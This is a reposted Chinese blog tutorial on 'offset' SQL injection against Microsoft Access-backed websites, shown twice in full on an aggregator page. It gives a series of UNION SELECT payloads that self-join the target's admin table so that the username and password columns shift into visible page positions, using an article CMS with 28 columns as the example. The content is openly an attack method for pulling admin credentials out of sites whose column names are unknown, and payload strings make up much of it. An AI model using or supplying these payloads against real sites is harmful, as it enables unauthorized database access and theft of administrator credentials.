Access注入偏移爆字段
生活随笔
收集整理的這篇文章主要介紹了
Access注入偏移爆字段
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
作者:莫良
0x01
此方法解決%90注入得到表得不到字段的網站,舉動力文章為例子,它有28個字段,集合admin表5個字段,那么
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin
* 就是5個字段?這樣來爆admin里邊的所有表名,但注意 * 確實代表了所有admin表的字段。如果正好比如username在可顯示位置,他就會顯示在頁面上。
0x02
技術都有局限性 這個方法需要知道表名和一個字段名id,不需要其他字段,比如什么password username 。你要問他如果不在可顯示位置么,通常不知道的是表名 表段名 可以通過查找后臺登陸找到,這個就要看自己的了。
大家看看這個語句
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id)
這 個(admin as a inner join admin as b on a.id=b.id)是admin表自連接,這樣from 后面的表就會成為字段數加倍的表,前面18+2*5 = 28 個字段 就是合法的。* 代表的字段就會拓寬 加大username password在可顯示位置的幾率。
如果不在怎么辦? 那么
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id)
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
大家是否覺得很疑惑 18+ 2 + 5*2 = 30 > 28 但這條語句是合法的
這 個地方很關鍵,他為什么會是合法的語句,這個地方是技術核心 必須理解。前邊是 30 后邊是 28 怎么可能相等?因為a.id 和 b.id在 * 里是有的,那么計算機自動去掉重復的保持集合里元素的唯一性,這樣一來雖然查詢效果一樣,但是*里的字段排列順序卻被打亂了!先后兩次打亂 很有可能讓username password偏移到可顯示的位置。
如果還沒成功 怎么辦?
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)
union select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on a.id=d.id)
0x03
在我還沒有看到這篇文章之前,我就有個思路,使用交叉查詢(join on)爆列名,不過看了這,篇文章之后,感覺這個還是很局限性的,有空再自己測試研究一下,畢竟SQL語句是強大的。
http://81sec.com/read.php/25.htm
0x01
此方法解決%90注入得到表得不到字段的網站,舉動力文章為例子,它有28個字段,集合admin表5個字段,那么
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin
* 就是5個字段?這樣來爆admin里邊的所有表名,但注意 * 確實代表了所有admin表的字段。如果正好比如username在可顯示位置,他就會顯示在頁面上。
0x02
技術都有局限性 這個方法需要知道表名和一個字段名id,不需要其他字段,比如什么password username 。你要問他如果不在可顯示位置么,通常不知道的是表名 表段名 可以通過查找后臺登陸找到,這個就要看自己的了。
大家看看這個語句
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id)
這 個(admin as a inner join admin as b on a.id=b.id)是admin表自連接,這樣from 后面的表就會成為字段數加倍的表,前面18+2*5 = 28 個字段 就是合法的。* 代表的字段就會拓寬 加大username password在可顯示位置的幾率。
如果不在怎么辦? 那么
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id)
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
大家是否覺得很疑惑 18+ 2 + 5*2 = 30 > 28 但這條語句是合法的
這 個地方很關鍵,他為什么會是合法的語句,這個地方是技術核心 必須理解。前邊是 30 后邊是 28 怎么可能相等?因為a.id 和 b.id在 * 里是有的,那么計算機自動去掉重復的保持集合里元素的唯一性,這樣一來雖然查詢效果一樣,但是*里的字段排列順序卻被打亂了!先后兩次打亂 很有可能讓username password偏移到可顯示的位置。
如果還沒成功 怎么辦?
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)
union select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on a.id=d.id)
0x03
在我還沒有看到這篇文章之前,我就有個思路,使用交叉查詢(join on)爆列名,不過看了這,篇文章之后,感覺這個還是很局限性的,有空再自己測試研究一下,畢竟SQL語句是強大的。
http://81sec.com/read.php/25.htm
轉載于:https://blog.51cto.com/obnus/395572
總結
以上是生活随笔為你收集整理的Access注入偏移爆字段的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 净值低的时候买还是高时买 只需要注意这
- 下一篇: 孩子种的小辣椒